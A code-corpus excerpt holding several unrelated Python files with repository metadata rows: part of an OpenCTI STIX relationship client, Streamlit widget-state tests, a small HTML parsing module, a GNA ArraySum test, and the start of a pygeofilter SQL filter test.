stixCoreRelationshipEdit(id: $id) {
relationAdd(input: $input) {
id
}
}
}
"""
self.opencti.query(
query,
{
"id": id,
"input": {
"toId": kill_chain_phase_id,
"relationship_type": "kill-chain-phase",
},
},
)
return True
else:
self.opencti.log(
"error",
"[opencti_stix_core_relationship] Missing parameters: id and kill_chain_phase_id",
)
return False
"""
Remove a Kill-Chain-Phase object to stix_core_relationship object
:param id: the id of the stix_core_relationship
:param kill_chain_phase_id: the id of the Kill-Chain-Phase
:return Boolean
"""
def remove_kill_chain_phase(self, **kwargs):
id = kwargs.get("id", None)
kill_chain_phase_id = kwargs.get("kill_chain_phase_id", None)
if id is not None and kill_chain_phase_id is not None:
self.opencti.log(
"info",
"Removing Kill-Chain-Phase {"
+ kill_chain_phase_id
+ "} from stix_core_relationship {"
+ id
+ "}",
)
query = """
mutation StixCoreRelationshipRemoveRelation($id: ID!, $toId: String!, $relationship_type: String!) {
stixCoreRelationshipEdit(id: $id) {
relationDelete(toId: $toId, relationship_type: $relationship_type) {
id
}
}
}
"""
self.opencti.query(
query,
{
"id": id,
"toId": kill_chain_phase_id,
"relationship_type": "kill-chain-phase",
},
)
return True
else:
self.opencti.log(
"error",
"[stix_core_relationship] Missing parameters: id and kill_chain_phase_id",
)
return False
"""
Update the Identity author of a stix_core_relationship object (created_by)
:param id: the id of the stix_core_relationship
:param identity_id: the id of the Identity
:return Boolean
"""
def update_created_by(self, **kwargs):
id = kwargs.get("id", None)
identity_id = kwargs.get("identity_id", None)
if id is not None:
self.opencti.log(
"info",
"Updating author of stix_core_relationship {"
+ id
+ "} with Identity {"
+ str(identity_id)
+ "}",
)
custom_attributes = """
id
createdBy {
... on Identity {
id
standard_id
entity_type
parent_types
name
x_opencti_aliases
description
created
modified
}
... on Organization {
x_opencti_organization_type
x_opencti_reliability
}
... on Individual {
x_opencti_firstname
x_opencti_lastname
}
}
"""
stix_domain_object = self.read(id=id, customAttributes=custom_attributes)
if stix_domain_object["createdBy"] is not None:
query = """
mutation StixCoreRelationshipEdit($id: ID!, $toId: String! $relationship_type: String!) {
stixCoreRelationshipEdit(id: $id) {
relationDelete(toId: $toId, relationship_type: $relationship_type) {
id
}
}
}
"""
self.opencti.query(
query,
{
"id": id,
"toId": stix_domain_object["createdBy"]["id"],
"relationship_type": "created-by",
},
)
if identity_id is not None:
# Add the new relation
query = """
mutation StixCoreRelationshipEdit($id: ID!, $input: StixMetaRelationshipAddInput) {
stixCoreRelationshipEdit(id: $id) {
relationAdd(input: $input) {
id
}
}
}
"""
variables = {
"id": id,
"input": {
"toId": identity_id,
"relationship_type": "created-by",
},
}
self.opencti.query(query, variables)
else:
self.opencti.log("error", "Missing parameters: id")
return False
"""
Import an Indicator object from a STIX2 object
:param stixObject: the Stix-Object Indicator
:return Indicator object
"""
def import_from_stix2(self, **kwargs):
stix_relation = kwargs.get("stixRelation", None)
extras = kwargs.get("extras", {})
update = kwargs.get("update", False)
default_date = kwargs.get("defaultDate", False)
if stix_relation is not None:
source_ref = stix_relation["source_ref"]
target_ref = stix_relation["target_ref"]
return self.create(
fromId=source_ref,
toId=target_ref,
stix_id=stix_relation["id"],
relationship_type=stix_relation["relationship_type"],
description=self.opencti.stix2.convert_markdown(
stix_relation["description"]
)
if "description" in stix_relation
else "",
start_time=stix_relation["start_time"]
if "start_time" in stix_relation
else default_date,
stop_time=stix_relation["stop_time"]
if "stop_time" in stix_relation
else default_date,
revoked=stix_relation["revoked"]
if "revoked" in stix_relation
else None,
confidence=stix_relation["confidence"]
if "confidence" in stix_relation
else None,
lang=stix_relation["lang"] if "lang" in stix_relation else None,
created=stix_relation["created"]
if "created" in stix_relation
else None,
modified=stix_relation["modified"]
if "modified" in stix_relation
else None,
createdBy=extras["created_by_id"]
if "created_by_id" in extras
else None,
objectMarking=extras["object_marking_ids"]
if "object_marking_ids" in extras
else None,
objectLabel=extras["object_label_ids"]
if "object_label_ids" in extras
else [],
externalReferences=extras["external_references_ids"]
if "external_references_ids" in extras
else [],
killChainPhases=extras["kill_chain_phases_ids"]
if "kill_chain_phases_ids" in extras
else None,
update=update,
)
else:
self.opencti.log(
"error", "[opencti_attack_pattern] Missing parameters: stixObject"
)
| 35.222222
| 409
| 0.431235
|
4a0a19b28db9e1a6b6f471cc8cb0591e27983e5e
| 11,669
|
py
|
Python
|
lib/tests/streamlit/state/widgets_test.py
|
stungkit/streamlit
|
3badd94f40ba8db2f9e89e8835f7f0530d290ba0
|
[
"Apache-2.0"
] | 1
|
2019-11-01T08:37:00.000Z
|
2019-11-01T08:37:00.000Z
|
lib/tests/streamlit/state/widgets_test.py
|
stungkit/streamlit
|
3badd94f40ba8db2f9e89e8835f7f0530d290ba0
|
[
"Apache-2.0"
] | 35
|
2021-10-12T04:41:39.000Z
|
2022-03-28T04:50:45.000Z
|
lib/tests/streamlit/state/widgets_test.py
|
stungkit/streamlit
|
3badd94f40ba8db2f9e89e8835f7f0530d290ba0
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2018-2022 Streamlit Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests widget-related functionality"""
import unittest
import pytest
from parameterized import parameterized
from unittest.mock import call, MagicMock
import streamlit as st
from streamlit import errors
from streamlit.proto.Button_pb2 import Button as ButtonProto
from streamlit.proto.WidgetStates_pb2 import WidgetStates
from streamlit.state.session_state import GENERATED_WIDGET_KEY_PREFIX
from streamlit.state.widgets import (
_get_widget_id,
coalesce_widget_states,
)
from streamlit.state.session_state import SessionState, WidgetMetadata
from tests import testutil
def _create_widget(id, states):
    """Append a new WidgetState with the given id to *states* and return it."""
    widget = states.widgets.add()
    widget.id = id
    return widget
def create_metadata(id, value_type):
    """Build a WidgetMetadata whose (de)serializers pass values through."""
    deserializer = lambda x, s: x
    return WidgetMetadata(id, deserializer, identity, value_type)
def identity(x):
    """No-op serializer: return *x* unchanged."""
    return x
class WidgetManagerTests(unittest.TestCase):
    """Unit tests for SessionState's widget-state handling."""
    def test_get(self):
        """Widget values of every proto value type are readable by id."""
        states = WidgetStates()
        _create_widget("trigger", states).trigger_value = True
        _create_widget("bool", states).bool_value = True
        _create_widget("float", states).double_value = 0.5
        _create_widget("int", states).int_value = 123
        _create_widget("string", states).string_value = "howdy!"
        session_state = SessionState()
        session_state.set_widgets_from_proto(states)
        session_state._set_widget_metadata(create_metadata("trigger", "trigger_value"))
        session_state._set_widget_metadata(create_metadata("bool", "bool_value"))
        session_state._set_widget_metadata(create_metadata("float", "double_value"))
        session_state._set_widget_metadata(create_metadata("int", "int_value"))
        session_state._set_widget_metadata(create_metadata("string", "string_value"))
        self.assertEqual(True, session_state["trigger"])
        self.assertEqual(True, session_state["bool"])
        self.assertAlmostEqual(0.5, session_state["float"])
        self.assertEqual(123, session_state["int"])
        self.assertEqual("howdy!", session_state["string"])
    def test_get_nonexistent(self):
        """Reading an unknown widget id raises KeyError."""
        session_state = SessionState()
        self.assertRaises(KeyError, lambda: session_state["fake_widget_id"])
    @pytest.mark.skip
    def test_get_keyed_widget_values(self):
        """(Skipped) only user-keyed widgets appear in values()."""
        # NOTE(review): create_metadata takes two arguments, so the 3-arg
        # call below would raise TypeError if this skipped test were
        # re-enabled — confirm intent before unskipping.
        states = WidgetStates()
        _create_widget("trigger", states).trigger_value = True
        _create_widget("trigger2", states).trigger_value = True
        session_state = SessionState()
        session_state.set_widgets_from_proto(states)
        session_state._set_widget_metadata(
            create_metadata("trigger", "trigger_value", True)
        )
        session_state._set_widget_metadata(create_metadata("trigger2", "trigger_value"))
        self.assertEqual(dict(session_state.values()), {"trigger": True})
    def test_get_prev_widget_value_nonexistent(self):
        """Unknown ids raise KeyError for previous values too."""
        session_state = SessionState()
        self.assertRaises(KeyError, lambda: session_state["fake_widget_id"])
    def test_set_widget_attrs_nonexistent(self):
        """Metadata can be registered for an id with no stored state yet."""
        session_state = SessionState()
        session_state._set_widget_metadata(create_metadata("fake_widget_id", ""))
        self.assertTrue(
            isinstance(
                session_state._new_widget_state.widget_metadata["fake_widget_id"],
                WidgetMetadata,
            )
        )
    def test_call_callbacks(self):
        """Test the call_callbacks method in 6 possible cases:
        1. A widget does not have a callback
        2. A widget's old and new values are equal, so the callback is not
        called.
        3. A widget's callback has no args provided.
        4. A widget's callback has just args provided.
        5. A widget's callback has just kwargs provided.
        6. A widget's callback has both args and kwargs provided.
        """
        prev_states = WidgetStates()
        _create_widget("trigger", prev_states).trigger_value = True
        _create_widget("bool", prev_states).bool_value = True
        _create_widget("bool2", prev_states).bool_value = True
        _create_widget("float", prev_states).double_value = 0.5
        _create_widget("int", prev_states).int_value = 123
        _create_widget("string", prev_states).string_value = "howdy!"
        session_state = SessionState()
        session_state.set_widgets_from_proto(prev_states)
        mock_callback = MagicMock()
        deserializer = lambda x, s: x
        # (widget_id, value_type, callback, callback_args, callback_kwargs)
        callback_cases = [
            ("trigger", "trigger_value", None, None, None),
            ("bool", "bool_value", mock_callback, None, None),
            ("bool2", "bool_value", mock_callback, None, None),
            ("float", "double_value", mock_callback, (1,), None),
            ("int", "int_value", mock_callback, None, {"x": 2}),
            ("string", "string_value", mock_callback, (1,), {"x": 2}),
        ]
        for widget_id, value_type, callback, args, kwargs in callback_cases:
            session_state._set_widget_metadata(
                WidgetMetadata(
                    widget_id,
                    deserializer,
                    lambda x: x,
                    value_type=value_type,
                    callback=callback,
                    callback_args=args,
                    callback_kwargs=kwargs,
                )
            )
        # New states: "bool" keeps its value (callback not called), every
        # other widget changes.
        states = WidgetStates()
        _create_widget("trigger", states).trigger_value = True
        _create_widget("bool", states).bool_value = True
        _create_widget("bool2", states).bool_value = False
        _create_widget("float", states).double_value = 1.5
        _create_widget("int", states).int_value = 321
        _create_widget("string", states).string_value = "!ydwoh"
        session_state.on_script_will_rerun(states)
        mock_callback.assert_has_calls([call(), call(1), call(x=2), call(1, x=2)])
    def test_marshall_excludes_widgets_without_state(self):
        """Only widgets that actually carry a state are marshalled."""
        widget_states = WidgetStates()
        _create_widget("trigger", widget_states).trigger_value = True
        session_state = SessionState()
        session_state.set_widgets_from_proto(widget_states)
        session_state._set_widget_metadata(
            WidgetMetadata("other_widget", lambda x, s: x, None, "trigger_value", True)
        )
        widgets = session_state.get_widget_states()
        self.assertEqual(len(widgets), 1)
        self.assertEqual(widgets[0].id, "trigger")
    def test_reset_triggers(self):
        """_reset_triggers clears trigger values but leaves other types."""
        states = WidgetStates()
        session_state = SessionState()
        _create_widget("trigger", states).trigger_value = True
        _create_widget("int", states).int_value = 123
        session_state.set_widgets_from_proto(states)
        session_state._set_widget_metadata(
            WidgetMetadata("trigger", lambda x, s: x, None, "trigger_value")
        )
        session_state._set_widget_metadata(
            WidgetMetadata("int", lambda x, s: x, None, "int_value")
        )
        self.assertTrue(session_state["trigger"])
        self.assertEqual(123, session_state["int"])
        session_state._reset_triggers()
        self.assertFalse(session_state["trigger"])
        self.assertEqual(123, session_state["int"])
    def test_coalesce_widget_states(self):
        """Coalescing keeps set triggers from both old and new states."""
        session_state = SessionState()
        old_states = WidgetStates()
        _create_widget("old_set_trigger", old_states).trigger_value = True
        _create_widget("old_unset_trigger", old_states).trigger_value = False
        _create_widget("missing_in_new", old_states).int_value = 123
        _create_widget("shape_changing_trigger", old_states).trigger_value = True
        session_state._set_widget_metadata(
            create_metadata("old_set_trigger", "trigger_value")
        )
        session_state._set_widget_metadata(
            create_metadata("old_unset_trigger", "trigger_value")
        )
        session_state._set_widget_metadata(
            create_metadata("missing_in_new", "int_value")
        )
        # NOTE(review): "shape changing trigger" (with spaces) does not match
        # the widget id "shape_changing_trigger" used above; metadata for the
        # real id is registered further down — confirm this typo is harmless.
        session_state._set_widget_metadata(
            create_metadata("shape changing trigger", "trigger_value")
        )
        new_states = WidgetStates()
        _create_widget("old_set_trigger", new_states).trigger_value = False
        _create_widget("new_set_trigger", new_states).trigger_value = True
        _create_widget("added_in_new", new_states).int_value = 456
        _create_widget("shape_changing_trigger", new_states).int_value = 3
        session_state._set_widget_metadata(
            create_metadata("new_set_trigger", "trigger_value")
        )
        session_state._set_widget_metadata(create_metadata("added_in_new", "int_value"))
        session_state._set_widget_metadata(
            create_metadata("shape_changing_trigger", "int_value")
        )
        session_state.set_widgets_from_proto(
            coalesce_widget_states(old_states, new_states)
        )
        self.assertRaises(KeyError, lambda: session_state["old_unset_trigger"])
        self.assertRaises(KeyError, lambda: session_state["missing_in_new"])
        self.assertEqual(True, session_state["old_set_trigger"])
        self.assertEqual(True, session_state["new_set_trigger"])
        self.assertEqual(456, session_state["added_in_new"])
        # Widgets that were triggers before, but no longer are, will *not*
        # be coalesced
        self.assertEqual(3, session_state["shape_changing_trigger"])
class WidgetHelperTests(unittest.TestCase):
    """Tests for widget helper functions."""
    def test_get_widget_with_generated_key(self):
        """Auto-generated widget ids carry the generated-key prefix."""
        proto = ButtonProto()
        proto.label = "the label"
        widget_id = _get_widget_id("button", proto)
        self.assertTrue(widget_id.startswith(GENERATED_WIDGET_KEY_PREFIX))
class WidgetIdDisabledTests(testutil.DeltaGeneratorTestCase):
    """The `disabled` kwarg must not change a widget's identity: creating the
    same widget twice, once disabled, must raise DuplicateWidgetID."""
    @parameterized.expand(
        [
            (st.button,),
            (st.camera_input,),
            (st.checkbox,),
            (st.color_picker,),
            (st.file_uploader,),
            (st.number_input,),
            (st.slider,),
            (st.text_area,),
            (st.text_input,),
            (st.date_input,),
            (st.time_input,),
        ]
    )
    def test_disabled_parameter_id(self, widget_func):
        """Single-argument widgets: id unchanged by `disabled`."""
        widget_func("my_widget")
        # The `disabled` argument shouldn't affect a widget's ID, so we
        # expect a DuplicateWidgetID error.
        with self.assertRaises(errors.DuplicateWidgetID):
            widget_func("my_widget", disabled=True)
    def test_disabled_parameter_id_download_button(self):
        """download_button needs `data`, so it gets its own case."""
        st.download_button("my_widget", data="")
        with self.assertRaises(errors.DuplicateWidgetID):
            st.download_button("my_widget", data="", disabled=True)
    @parameterized.expand(
        [
            (st.multiselect,),
            (st.radio,),
            (st.select_slider,),
            (st.selectbox,),
        ]
    )
    def test_disabled_parameter_id_options_widgets(self, widget_func):
        """Options-based widgets: id unchanged by `disabled`."""
        options = ["a", "b", "c"]
        widget_func("my_widget", options)
        with self.assertRaises(errors.DuplicateWidgetID):
            widget_func("my_widget", options, disabled=True)
| 37.400641
| 88
| 0.664239
|
4a0a1a3abc058fd9e02c03c20b12a563365bdcf2
| 7,493
|
py
|
Python
|
pyparsehtml/src/parse_doc_string.py
|
pdoms/PyParseHtml
|
513ad30cdfb77eea815b66b1ad91c1c96f3dff81
|
[
"MIT"
] | null | null | null |
pyparsehtml/src/parse_doc_string.py
|
pdoms/PyParseHtml
|
513ad30cdfb77eea815b66b1ad91c1c96f3dff81
|
[
"MIT"
] | null | null | null |
pyparsehtml/src/parse_doc_string.py
|
pdoms/PyParseHtml
|
513ad30cdfb77eea815b66b1ad91c1c96f3dff81
|
[
"MIT"
] | null | null | null |
import re
import copy
from .element import Element
from .utils import isSelfCloser, mergeDict, representElementAsString, seqIdtoDict, getTagBySeqId
from .html_data import global_attributes, css_properties, html_tags_incl_attributes, html_tags_stripped
def addGlobalAttributes():
    """Build the default attribute dict shared by every tag.

    Each global attribute maps to "" except 'style', which maps to a dict
    of every known CSS property initialised to "".
    """
    attrs = {}
    for name in global_attributes:
        if name == 'style':
            attrs[name] = {prop: "" for prop in css_properties}
        else:
            attrs[name] = ""
    return attrs
def addSpecificAttributes(meta_tag):
    """Return the tag-specific attributes for *meta_tag*, each set to ""."""
    allowed = html_tags_incl_attributes[meta_tag['as_tag_identifier']]
    return {attribute: "" for attribute in allowed}
def sortTags(tags):
    """Return tags ordered by their opening position in the source string."""
    def start_index(tag):
        return tag['start_idx']
    return sorted(tags, key=start_index)
def getInnerContents(tags_up, input):
    """Fill innerHTML/outerHTML for every open tag using its matched closer.

    Self-closing tags ('open_close' / 'open_close_alt') have no inner
    content and are left untouched.  Mutates and returns *tags_up*.
    """
    for t in tags_up:
        if t['tag_role'] == 'open_close' or t['tag_role'] == 'open_close_alt':
            continue
        else:
            t['innerHTML'] = input[t['end_idx']+1:t['closer']['start_idx']]
            # BUG FIX: end_idx is the index OF the closing '>', so the slice
            # must extend one past it — otherwise outerHTML dropped the final
            # '>' of the closing tag.
            t['outerHTML'] = input[t['start_idx']:t['closer']['end_idx'] + 1]
    return tags_up
def hasClosingTags(collected):
    """True when any closing tag sits at a position other than index 1.

    The index-1 exclusion matches the original behaviour: a closer in the
    second slot is treated as the partner of the first opener.
    """
    return any(
        tag['tag_role'] == 'close' and position != 1
        for position, tag in enumerate(collected)
    )
def identifyTags(input):
    """Scan *input* for every known HTML tag and build one meta-dict per
    occurrence (tag_type, tag_role, start/end indexes, raw opening text,
    allowed attributes, trailing string).
    """
    collected_tags = []
    for tag in html_tags_stripped:
        # NOTE(review): the opener pattern requires whitespace after the tag
        # name, so attribute-less openers like "<p>" are never detected —
        # confirm whether that is intentional. (Pattern made a raw string to
        # avoid the invalid-escape warning on "\s".)
        as_open = re.findall(rf'<{tag}(?=\s)', input)
        as_close = re.findall(f'</{tag}', input)
        ##handle openers
        current_idx = 0
        for o in as_open:
            meta_tag = {}
            meta_tag['tag_type'] = tag
            matcher = f"<{tag} />"
            meta_tag['start_idx'] = input.index(o, current_idx)
            meta_tag['end_idx'] = input.index('>', meta_tag['start_idx'])
            meta_tag['with_attributes'] = input[meta_tag['start_idx']:meta_tag['end_idx'] +1]
            if isSelfCloser(matcher):
                meta_tag['tag_role'] = 'open_close'
                meta_tag['as_tag_identifier'] = matcher
            else:
                meta_tag['as_tag_identifier'] = f"<{tag}>"
                # A '/' before the closing '>' marks "<tag ... />" style.
                # NOTE(review): input.index raises ValueError when no '/'
                # follows start_idx anywhere in the string — pre-existing.
                if meta_tag['end_idx'] > input.index('/', meta_tag['start_idx']):
                    meta_tag['tag_role'] = 'open_close_alt'
                else:
                    meta_tag['tag_role'] = 'open'
            specific = addSpecificAttributes(meta_tag)
            globals = addGlobalAttributes()
            meta_tag['allowed_attributes'] = mergeDict([globals, specific])
            meta_tag['rest_string'] = input[meta_tag['end_idx'] + 1:]
            current_idx = meta_tag['end_idx']
            collected_tags.append(meta_tag)
        ##handle closers
        current_idx = 0
        for c in as_close:
            meta_tag = {}
            meta_tag['tag_type'] = tag
            meta_tag['tag_role'] = 'close'
            # BUG FIX: this previously read f"{o}>", reusing the stale opener
            # loop variable — a NameError whenever a tag had closers but no
            # matched opener. f"<{tag}>" is the value the old code produced
            # when it did work.
            meta_tag['as_tag_identifier'] = f"<{tag}>"
            meta_tag['start_idx'] = input.index(c, current_idx)
            meta_tag['end_idx'] = input.index('>', meta_tag['start_idx'])
            meta_tag['with_attributes'] = ""
            meta_tag['rest_string'] = input[meta_tag['end_idx'] + 1:]
            collected_tags.append(meta_tag)
            current_idx = meta_tag['end_idx'] +1
    return collected_tags
def parseStyleString(styles_, tag_styles):
    """Parse an inline CSS declaration list ("prop: value; ...") into
    *tag_styles* (mutated and returned).  Raises ValueError on a non-empty
    declaration with no ':', matching the original behaviour.
    """
    for declaration in styles_.split(";"):
        if declaration == "":
            continue
        separator = declaration.index(":")
        prop = declaration[:separator].strip()
        value = declaration[separator + 1:].strip()
        tag_styles[prop] = value
    return tag_styles
def parseAttributes(tags):
    """Fill each tag's allowed_attributes with the quoted values found in
    its raw opening-tag text; 'style' values are expanded via
    parseStyleString.  Mutates and returns *tags*.
    """
    for tag in tags:
        raw = tag['with_attributes']
        for attr in tag['allowed_attributes'].keys():
            marker = f"{attr}="
            if marker not in raw:
                continue
            eq_idx = raw.index("=", raw.index(marker))
            quote = raw[eq_idx + 1]
            close_idx = raw.index(quote, eq_idx + 2)
            value = raw[eq_idx + 2:close_idx]
            if attr == 'style':
                tag['allowed_attributes'][attr] = parseStyleString(
                    value, tag['allowed_attributes'][attr]
                )
            else:
                tag['allowed_attributes'][attr] = value
    return tags
def createSequence(sorted_tags):
    """Assign every tag a placeholder sequence id "<n>-$$_<tag_type>" and
    return (list of those ids, the mutated tag list).  The "$$" slot is
    later replaced with a role code by matchTokens.
    """
    sequence = []
    for position, tag in enumerate(sorted_tags):
        tag['seq_id'] = f"{str(position)}-$$_{tag['tag_type']}"
        sequence.append(tag['seq_id'])
    return (sequence, sorted_tags)
def matchTokens(tags_collected):
    """Pair opening tags with their closers and finalise sequence ids.

    Role codes written into the "$$" slot of each seq id: "3" self-closing,
    "1" opener, "2" closer (the closer inherits the opener's position
    number).  Openers are matched innermost-first by walking the remaining
    tags from the end; matched pairs are removed from the working list.
    Returns (sequence id list, list of resolved open/self-closing tags).
    """
    tags = sortTags(tags_collected)
    (seq, tags) = createSequence(tags)
    updated_tags = []
    to_remove = []
    no_of_open = 0
    for t in tags:
        if t['tag_role'] == 'open':
            no_of_open += 1
        # Self-closing tags need no partner: mark them "3" and set them aside.
        if t['tag_role'] == 'open_close':
            s = t['seq_id']
            t['seq_id'] = s.replace('$$', "3")
            s_idx = seq.index(s)
            seq[s_idx] = t['seq_id']
            updated_tags.append(t)
            to_remove.append(t)
        if t['tag_role'] == 'open_close_alt':
            s = t['seq_id']
            t['seq_id'] = s.replace('$$', "3")
            s_idx = seq.index(s)
            seq[s_idx] = t['seq_id']
            updated_tags.append(t)
            to_remove.append(t)
    for item in to_remove:
        tags.remove(item)
    #count open tags?
    current_length = len(tags)
    # One opener is resolved per outer iteration; scanning from the end
    # pairs the innermost unmatched opener with the first closer after it.
    while no_of_open > 0:
        for i in reversed(range(0, current_length)):
            open = {}
            close = {}
            if tags[i]['tag_role'] == 'open':
                open = tags[i]
                open_s = tags[i]['seq_id']
                open['seq_id'] = open['seq_id'].replace('$$', "1")
                seq[seq.index(open_s)] = open['seq_id']
                open_seq = seqIdtoDict(open['seq_id'])
                for f in range(i, len(tags)):
                    if tags[f]['tag_role'] == 'close':
                        close = tags[f]
                        close_s = tags[f]['seq_id']
                        close['seq_id'] = f"{open_seq['seq_unique']}-2_{open_seq['seq_tag_type']}"
                        seq[seq.index(close_s)] = close['seq_id']
                        break
                # wrong - needs to be a copy of the unfinished seq ID
                # NOTE(review): if no closer was found, `close` is still {}
                # and tags.remove(close) below raises ValueError — confirm
                # unmatched openers cannot reach this point.
                open['closer'] = close
                updated_tags.append(open)
                tags.remove(open)
                tags.remove(close)
                break
        current_length = len(tags)
        no_of_open -= 1
    return (seq, updated_tags)
# lifts style, id, class attributes to top level
def liftAttributes(tags):
    """Promote 'id', 'style' and 'class' from each tag's allowed_attributes
    to top-level keys, removing them from allowed_attributes.  Mutates and
    returns *tags*; raises KeyError if one of the keys is absent, matching
    the original behaviour.
    """
    for tag in tags:
        for attribute in ('id', 'style', 'class'):
            tag[attribute] = tag['allowed_attributes'].pop(attribute)
    return tags
def getText(seq_id, next_tag, tags):
    """Return the text between the element named by *seq_id* and the next
    tag in the sequence, prefixed with the '$_text_$_' marker; '' when the
    next tag cannot be located in the element's trailing string.
    """
    element = getTagBySeqId(tags, seq_id['seq_id'])
    trailing = element['rest_string']
    next_type = next_tag['seq_tag_type']
    # Role "2" is a closer, so look for "</tag"; otherwise an opener "<tag".
    if next_tag['seq_tag_role'] == '2':
        marker = f'</{next_type}'
    else:
        marker = f'<{next_type}'
    cut = trailing.find(marker)
    if cut == -1:
        return ''
    return '$_text_$_' + trailing[0:cut]
def handleTexts(sqs, tgs):
    """Insert the text found between consecutive sequence entries into the
    sequence list *sqs* (mutated and returned)."""
    pending = []
    for position in range(len(sqs) - 1):
        current = seqIdtoDict(sqs[position])
        following = seqIdtoDict(sqs[position + 1])
        pending.append({
            'after': sqs[position],
            'text': getText(current, following, tgs),
        })
    # NOTE(review): getText prefixes real text with '$_text_$_' and returns
    # '' when nothing is found, so this sentinel comparison never filters —
    # empty strings are inserted too. Confirm whether '$_text_$' was meant
    # to match getText's marker.
    for entry in pending:
        if entry['text'] != '$_text_$':
            insert_at = sqs.index(entry['after'])
            sqs.insert(insert_at + 1, entry['text'])
    return sqs
#find a way to represent dom as dictionary with levels of nesting (irrelevant of text, just to have it ready)
#e.g:
#body: {
# div: {
# text: ...
# p: {},
# p: {},
# p: {
# img: {}
# }
# }
# div: {}
# }
#
#
#
#
def mapHTMLString(input):
    """Run the full parsing pipeline over an HTML string.

    Returns (sequence id list with interleaved text nodes, list of Element
    instances built from the resolved tag meta-dicts).
    """
    parsed = identifyTags(input)
    (sequence, parsed) = matchTokens(parsed)
    parsed = getInnerContents(parsed, input)
    parsed = parseAttributes(parsed)
    parsed = liftAttributes(parsed)
    sequence = handleTexts(sequence, parsed)
    elements = [Element(meta) for meta in parsed]
    return (sequence, elements)
| 28.599237
| 120
| 0.605899
|
4a0a1c8d1caa55fef2e510f694b9be62ef57b02d
| 1,622
|
py
|
Python
|
tests/unit/transformations/test_arrsum.py
|
gnafit/gna
|
c1a58dac11783342c97a2da1b19c97b85bce0394
|
[
"MIT"
] | 5
|
2019-10-14T01:06:57.000Z
|
2021-02-02T16:33:06.000Z
|
tests/unit/transformations/test_arrsum.py
|
gnafit/gna
|
c1a58dac11783342c97a2da1b19c97b85bce0394
|
[
"MIT"
] | null | null | null |
tests/unit/transformations/test_arrsum.py
|
gnafit/gna
|
c1a58dac11783342c97a2da1b19c97b85bce0394
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
import numpy as np
from load import ROOT as R
from gna.env import env
from gna.parameters.printer import print_parameters
from gna import constructors as C
from gna.unittest import *
@floatcopy(globals(), addname=True)
def test_arrsum(function_name):
    """ArraySum must expose an evaluable equal to the sum of the VarArray,
    and track parameter changes (checked before and after setting var1)."""
    varname = 'out'
    ns = env.globalns(function_name)
    names = ["var1", "var2", "var3", "var4"]
    # Parameters with central values 0..3 feeding the VarArray below.
    variables = [ns.reqparameter(name, central=float(i), relsigma=0.1)
                    for i, name in enumerate(names)]
    with ns:
        var_arr = C.VarArray(names)
    print("Input var array ", var_arr.vararray.points.data())
    sum_arr = C.ArraySum(varname, var_arr, ns=ns)
    # materialize variable
    ns[varname].get()
    output = var_arr.vararray.points
    print('Data:', output.data(), output.data().sum())
    print("Value of %s evaluable immediately after initialization "%varname, ns[varname].value(), sum_arr.arrsum.sum.data())
    print()
    assert (output.data().sum()==ns[varname].value()).all()
    # sum_arr.arrsum.arr(var_arr.vararray)
    # sum_arr.exposeEvaluable(var_arr.vararray)
    # print(sum_arr.arrsum.accumulated.data())
    print("Change value of var1 variable to 10")
    ns['var1'].set(10)
    print('Data:', output.data(), output.data().sum())
    ns[varname].dump()
    print("Sum should now be ", np.sum(var_arr.vararray.points.data()))
    print("Check the value %s of evaluable now: "%varname, ns['out'].value(), sum_arr.arrsum.sum.data())
    assert (output.data().sum()==ns[varname].value()).all()
    print()
    ns.printparameters()
if __name__ == "__main__":
run_unittests(globals())
| 34.510638
| 124
| 0.668311
|
4a0a1cad4874fd2bdac1e138eceb5a27b6a7ac30
| 7,191
|
py
|
Python
|
tests/test_sql/test_evaluate.py
|
rsmith013/pygeofilter
|
cf3ac068d37a0895a3f88e2aa3a7d375911acc0b
|
[
"MIT"
] | null | null | null |
tests/test_sql/test_evaluate.py
|
rsmith013/pygeofilter
|
cf3ac068d37a0895a3f88e2aa3a7d375911acc0b
|
[
"MIT"
] | null | null | null |
tests/test_sql/test_evaluate.py
|
rsmith013/pygeofilter
|
cf3ac068d37a0895a3f88e2aa3a7d375911acc0b
|
[
"MIT"
] | null | null | null |
from datetime import date, datetime
from pygeofilter.backends.sql import to_sql_where
from pygeofilter.parsers.ecql import parse
from osgeo import ogr
import pytest
ogr.UseExceptions()
@pytest.fixture
def data():
    """In-memory OGR datasource with one layer and two point features
    covering every attribute type used by the filter tests."""
    driver = ogr.GetDriverByName('MEMORY')
    source = driver.CreateDataSource('data')
    layer = source.CreateLayer("layer")
    id_attr = ogr.FieldDefn("id", ogr.OFTInteger)
    layer.CreateField(id_attr)
    str_attr = ogr.FieldDefn("str_attr", ogr.OFTString)
    layer.CreateField(str_attr)
    # Nullable string column: NULL in the first feature, set in the second.
    maybe_str_attr = ogr.FieldDefn("maybe_str_attr", ogr.OFTString)
    layer.CreateField(maybe_str_attr)
    int_attr = ogr.FieldDefn("int_attr", ogr.OFTInteger)
    layer.CreateField(int_attr)
    float_attr = ogr.FieldDefn("float_attr", ogr.OFTReal)
    layer.CreateField(float_attr)
    date_attr = ogr.FieldDefn("date_attr", ogr.OFTDate)
    layer.CreateField(date_attr)
    datetime_attr = ogr.FieldDefn("datetime_attr", ogr.OFTDateTime)
    layer.CreateField(datetime_attr)
    # Feature 0 at (1 1).
    feature_def = layer.GetLayerDefn()
    feature = ogr.Feature(feature_def)
    feature.SetGeometry(ogr.CreateGeometryFromWkt("POINT (1 1)"))
    feature.SetField("id", 0)
    feature.SetField("str_attr", "this is a test")
    feature.SetField("maybe_str_attr", None)
    feature.SetField("int_attr", 5)
    feature.SetField("float_attr", 5.5)
    feature.SetField("date_attr", "2010-01-01")
    feature.SetField("datetime_attr", "2010-01-01T00:00:00Z")
    layer.CreateFeature(feature)
    feature = None
    # Feature 1 at (2 2).
    feature_def = layer.GetLayerDefn()
    feature = ogr.Feature(feature_def)
    feature.SetGeometry(ogr.CreateGeometryFromWkt("POINT (2 2)"))
    feature.SetField("id", 1)
    feature.SetField("str_attr", "this is another test")
    feature.SetField("maybe_str_attr", 'not null')
    feature.SetField("int_attr", 8)
    feature.SetField("float_attr", 8.5)
